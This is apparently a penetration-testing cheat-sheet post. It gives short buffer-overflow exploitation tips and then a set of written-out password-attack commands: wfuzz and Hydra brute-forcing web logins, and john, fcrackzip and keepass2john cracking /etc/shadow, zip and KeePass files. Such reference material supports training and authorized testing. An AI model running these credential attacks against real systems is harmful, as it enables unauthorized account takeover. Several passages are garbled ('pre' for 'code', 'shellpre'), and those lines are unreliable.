[ Pen Testing ] :: Step by Step: Exploitation


BOF (buffer overflow) Exploits

Buffer overflows are pretty technical, but eventually you’ll find yourself using them. In most cases you’ll copy or create code and encode it into a shellcode exploit.

Review and correct the initial pre for configurable variables.

Pay special attention to removing all badchars. Which characters are bad depends heavily on context.

Check pre carefully after removing badchars, since this may change the way the shellpre works.

Monitor traffic with Wireshark to ensure the entire shellpre is being transmitted.

Run the exploit several times and observe obsessively.

Make sure you’re using the correct JMP ESP for the OS and language.

Weak Credentials Exploits

HTTP Brute Force Cracking

“Use colour output (-c), a wordlist as a payload (-z file,/usr/share/wfuzz/wordlist/general/common.txt), and hide 404 messages (–hc 404) to fuzz the given URL (” where FUZZ is the keyword that indicates the first insertion point for fuzzing. FUZ2Z indicates the second, etc.

wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt --hc 404

See full examples at:

  • Use wfuzz against NTLM authentication.
wfuzz -c --ntlm "admin:FUZZ" -z file,/usr/share/wordlists/rockyou.txt --hc 401 https://<ip>/api
  • Use wfuzz against Basic Authentication through Proxy.
wfuzz -c --hc 404,400,401 -z
file,/root/Documents/names.txt -z
file,/root/Documents/names.txt --basic "FUZZ:FUZ2Z" -p https://<ip>/api/v1/
  • Use Hydra from THC (that’s why it’s often called THC Hydra) as a website password cracker.

Get it and learn it from the source:

See this good short “Summary, Tutorial and Resources”:


hydra [some command line options] [-s PORT] TARGET PROTOCOL [MODULE-OPTIONS]


hydra -s 80 http-form-post
"/admin/index.php:user=^USER^&password=^PASS^:Moved Temporarily" -l
admin -P /usr/share/wordlists/rockyou.txt -t 20
Password Cracking Specific File Types/Alogorythms
  • Use fcrackzip to crack password-protected zip files.
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt file.zip
  • Use unshadow and john to crack /etc/shadow passwords.
unshadow passwd shadow > passwords
john --wordlist=/usr/share/wordlists/rockyou.txt passwords
  • Use keepass2john and john to crack keepass password databases.
keepass2john /root/Desktop/NewDatabase.kdb > file
john -incremental:alpha -format=keepass file
  • Bruteforce salted hashes. This example from Adon90 assumes the presence of several files.
for j in $(cat cipher); do echo $j; for i in $(cat digestion); do /root/Documents/HTB/Hawk/bruteforce-salted-openssl/bruteforce-salted-openssl -t 10 -f /usr/share/wordlists/rockyou.txt -c $j -d $i ../miau.txt -1 2>&1 | grep "candidate" ; done ; done
openssl aes-256-cbc -d -in ../miau.txt -out result.txt -k friends


Leave a Reply